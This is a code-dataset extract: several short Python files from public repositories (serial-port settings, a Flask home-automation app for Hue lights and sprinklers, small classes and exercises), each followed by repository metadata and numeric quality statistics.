2c2677ca64f33e37bed56f94854ee1e79cc5fe79 | 431 | py | Python | dsmr_parser/clients/settings.py | vavdb/dsmr_parser | de5c884d8d4c8cc789155fd37d03caf31d997452 | [
"MIT"
] | null | null | null | dsmr_parser/clients/settings.py | vavdb/dsmr_parser | de5c884d8d4c8cc789155fd37d03caf31d997452 | [
"MIT"
] | null | null | null | dsmr_parser/clients/settings.py | vavdb/dsmr_parser | de5c884d8d4c8cc789155fd37d03caf31d997452 | [
"MIT"
] | null | null | null | import serial
SERIAL_SETTINGS_V2_2 = {
'baudrate': 9600,
'bytesize': serial.SEVENBITS,
'parity': serial.PARITY_EVEN,
'stopbits': serial.STOPBITS_ONE,
'xonxoff': 0,
'rtscts': 0,
'timeout': 20
}
SERIAL_SETTINGS_V4 = {
'baudrate': 115200,
'bytesize': serial.SEVENBITS,
'parity': serial.PARITY_EVEN,
'stopbits': serial.STOPBITS_ONE,
'xonxoff': 0,
'rtscts': 0,
'timeout': 20
}
| 18.73913 | 36 | 0.62181 | 47 | 431 | 5.510638 | 0.425532 | 0.108108 | 0.177606 | 0.223938 | 0.725869 | 0.725869 | 0.725869 | 0.725869 | 0.725869 | 0.725869 | 0 | 0.062874 | 0.225058 | 431 | 22 | 37 | 19.590909 | 0.712575 | 0 | 0 | 0.631579 | 0 | 0 | 0.232019 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
258fd284b24465674f81bdaac846d31cb29e311d | 34 | py | Python | __init__.py | DivyanshuSingh96/myCalc9 | e26f1723a1e1d4fb45ec111279f9b1055ae2449f | [
"MIT"
] | 2 | 2021-03-03T11:46:40.000Z | 2021-07-07T12:24:50.000Z | __init__.py | DivyanshuSingh96/myCalc9 | e26f1723a1e1d4fb45ec111279f9b1055ae2449f | [
"MIT"
] | null | null | null | __init__.py | DivyanshuSingh96/myCalc9 | e26f1723a1e1d4fb45ec111279f9b1055ae2449f | [
"MIT"
] | null | null | null | from myCalc9.arithmetics import *
| 17 | 33 | 0.823529 | 4 | 34 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.117647 | 34 | 1 | 34 | 34 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
25eb000a789e18fcdcb030744e52444ccb3f38ec | 5,010 | py | Python | services/wsgi.py | santiagofacchini/home-automation | c0008c292b0db73ea66c6759c1eb2858fa803891 | [
"MIT"
] | null | null | null | services/wsgi.py | santiagofacchini/home-automation | c0008c292b0db73ea66c6759c1eb2858fa803891 | [
"MIT"
] | null | null | null | services/wsgi.py | santiagofacchini/home-automation | c0008c292b0db73ea66c6759c1eb2858fa803891 | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask import render_template
from HueClient import Light
from SonoffClient import Switch
from dotenv import load_dotenv
# Load environment variables from .env file (must be in ~)
load_dotenv(f'{os.environ["HOME"]}/.env')
# Hue client
hue_user = os.environ['HUE_USER']
hue_ip = os.environ['HUE_IP']
# Sprinklers
sprinklers_ip = os.environ['SPRINKLERS_IP']
sprinklers_port = os.environ['SPRINKLERS_PORT']
app = Flask(__name__)
@app.route('/')
def main():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/all-on")
def all_on():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor.turn_on()
sala_de_estar.turn_on()
dormitorio.turn_on()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/all-off")
def all_off():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor.turn_off()
sala_de_estar.turn_off()
dormitorio.turn_off()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/comedor")
def comedor():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor.flip_state()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/sala-de-estar")
def sala_de_estar():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
sala_de_estar.flip_state()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/lights/dormitorio")
def dormitorio():
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
dormitorio.flip_state()
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers_state = sprinklers.get_info()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
@app.route("/sprinklers")
def sprinklers():
sprinklers = Switch(sprinklers_ip, sprinklers_port)
sprinklers.switch_state()
sprinklers_state = sprinklers.get_info()
comedor = Light(hue_user, hue_ip, 1)
sala_de_estar = Light(hue_user, hue_ip, 4)
dormitorio = Light(hue_user, hue_ip, 3)
comedor_state = comedor.get_state()
sala_de_estar_state = sala_de_estar.get_state()
dormitorio_state = dormitorio.get_state()
return render_template('main.html', comedor_state=comedor_state, sala_de_estar_state=sala_de_estar_state, dormitorio_state=dormitorio_state, sprinklers_state=sprinklers_state)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=4000, load_dotenv=True) | 42.820513 | 179 | 0.765868 | 716 | 5,010 | 4.955307 | 0.082402 | 0.067644 | 0.124014 | 0.126268 | 0.82159 | 0.81257 | 0.81257 | 0.797914 | 0.797914 | 0.797914 | 0 | 0.006668 | 0.131936 | 5,010 | 117 | 180 | 42.820513 | 0.809152 | 0.015569 | 0 | 0.623762 | 0 | 0 | 0.048691 | 0.009333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.059406 | 0 | 0.19802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d30ca7d1a9433459ec2672c985efbaa1d4de9991 | 58 | py | Python | python/testData/quickFixes/PyRemoveParameterQuickFixTest/kwParam_after.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/quickFixes/PyRemoveParameterQuickFixTest/kwParam_after.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/quickFixes/PyRemoveParameterQuickFixTest/kwParam_after.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z |
def foo(r):
def a():
pass
x = 1
x = 2 | 9.666667 | 12 | 0.327586 | 10 | 58 | 1.9 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.534483 | 58 | 6 | 13 | 9.666667 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.2 | 0 | 0 | 0.4 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
d323c6aaa77d2038a7ff94c81fd580cccec65641 | 71 | py | Python | hackaton/ML.py | vladimirbahmetyev/SocialHack | 8b530384dd2d440be1f6d480f39aec31d8c9dab7 | [
"Apache-2.0"
] | null | null | null | hackaton/ML.py | vladimirbahmetyev/SocialHack | 8b530384dd2d440be1f6d480f39aec31d8c9dab7 | [
"Apache-2.0"
] | null | null | null | hackaton/ML.py | vladimirbahmetyev/SocialHack | 8b530384dd2d440be1f6d480f39aec31d8c9dab7 | [
"Apache-2.0"
] | 1 | 2019-05-11T23:53:04.000Z | 2019-05-11T23:53:04.000Z | import random
def CalcTone(input: str):
    return random.randint(1, 3)
6cb34980b856a1fa798f088cdd922fb0374e1f3c | 890 | py | Python | Part_3_advanced/m15_design_patterns/abstract_factory/homework_1_solution/document_system/text_input.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_3_advanced/m15_design_patterns/abstract_factory/homework_1_solution/document_system/text_input.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_3_advanced/m15_design_patterns/abstract_factory/homework_1_solution/document_system/text_input.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | from typing import Protocol
class Input(Protocol):
def render(self) -> None:
...
def on_key_pressed(self, key: str) -> None:
...
class LinuxInput:
INPUT_SIZE = 10
def __init__(self) -> None:
self.text = ""
def render(self) -> None:
spacing = self.INPUT_SIZE - 2 - len(self.text)
print(self.INPUT_SIZE * "-")
        print(f"|{self.text}{spacing * ' '}|")  # render the typed text inside the box
print(self.INPUT_SIZE * "-")
def on_key_pressed(self, key: str) -> None:
self.text += key
class WindowsInput:
INPUT_SIZE = 14
def __init__(self) -> None:
self.text = ""
def render(self) -> None:
spacing = self.INPUT_SIZE - 2 - len(self.text)
print(self.INPUT_SIZE * "=")
        print(f"[{self.text}{spacing * ' '}]")  # render the typed text inside the box
print(self.INPUT_SIZE * "=")
def on_key_pressed(self, key: str) -> None:
self.text += key
| 21.190476 | 54 | 0.546067 | 109 | 890 | 4.256881 | 0.238532 | 0.155172 | 0.168103 | 0.155172 | 0.756466 | 0.756466 | 0.756466 | 0.756466 | 0.693966 | 0.693966 | 0 | 0.009631 | 0.3 | 890 | 41 | 55 | 21.707317 | 0.735152 | 0 | 0 | 0.714286 | 0 | 0 | 0.042697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.035714 | 0 | 0.5 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9f0162b8862dc57d55701a4d56293eedc2c95a92 | 151 | py | Python | solutions_by_text/utils.py | sijanonly/sbt-python-client | b467d78414e7e01181025cd25456756f46ace237 | [
"MIT"
] | 1 | 2018-10-12T20:20:22.000Z | 2018-10-12T20:20:22.000Z | solutions_by_text/utils.py | sijanonly/sbt-python-client | b467d78414e7e01181025cd25456756f46ace237 | [
"MIT"
] | null | null | null | solutions_by_text/utils.py | sijanonly/sbt-python-client | b467d78414e7e01181025cd25456756f46ace237 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author: sijanonly
# @Date: 2018-03-15 14:14:21
# @Last Modified time: 2018-03-15 17:14:19
def build_payload():
pass
| 16.777778 | 42 | 0.615894 | 25 | 151 | 3.68 | 0.8 | 0.130435 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237705 | 0.192053 | 151 | 8 | 43 | 18.875 | 0.516393 | 0.728477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
9f5cf3ad9b3e92d21fef53c5a9c52e6ddf81eed2 | 39 | py | Python | Python3xPractice/Test.py | csitedexperts/DataScienceA2Z | 9178c73be8adb6d6b5c142b0f2aa99471e5ca79b | [
"Apache-2.0"
] | 3 | 2019-04-13T04:00:42.000Z | 2020-10-02T01:14:42.000Z | Python3xPractice/Test.py | csitedexperts/DSML_MadeEasy | 9af03a00fb026930c19737790f603a0b0ae40b7e | [
"Apache-2.0"
] | null | null | null | Python3xPractice/Test.py | csitedexperts/DSML_MadeEasy | 9af03a00fb026930c19737790f603a0b0ae40b7e | [
"Apache-2.0"
] | 2 | 2019-03-30T18:55:32.000Z | 2020-05-10T16:30:34.000Z | print("Welcome to Data Science A2Z")
| 13 | 37 | 0.717949 | 6 | 39 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.179487 | 39 | 2 | 38 | 19.5 | 0.84375 | 0 | 0 | 0 | 0 | 0 | 0.710526 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
9f82f70ef74d8aaee077944c7facdb3246b28906 | 401 | py | Python | python_exercises/Curso_em_video/ex108.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex108.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex108.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | import moeda
preco = float(input(' - Digite um preco \033[1;32mR$\033[m: '))
print(f' - A metade de {moeda.moeda(preco)} e {moeda.moeda(moeda.metade(preco))}')
print(f' - O dobro de {moeda.moeda(preco)} e {moeda.moeda(moeda.dobro(preco))}')
print(f' - Aumentando 10%, temos {moeda.moeda(moeda.aumentar(preco, 10))}')
print(f' - Diminuindo 13%, temos {moeda.moeda(moeda.diminuir(preco, 13))}')
| 50.125 | 83 | 0.670823 | 63 | 401 | 4.269841 | 0.412698 | 0.371747 | 0.223048 | 0.126394 | 0.245353 | 0.245353 | 0.245353 | 0.245353 | 0 | 0 | 0 | 0.048295 | 0.122195 | 401 | 7 | 84 | 57.285714 | 0.715909 | 0 | 0 | 0 | 0 | 0.333333 | 0.78934 | 0.34264 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.666667 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |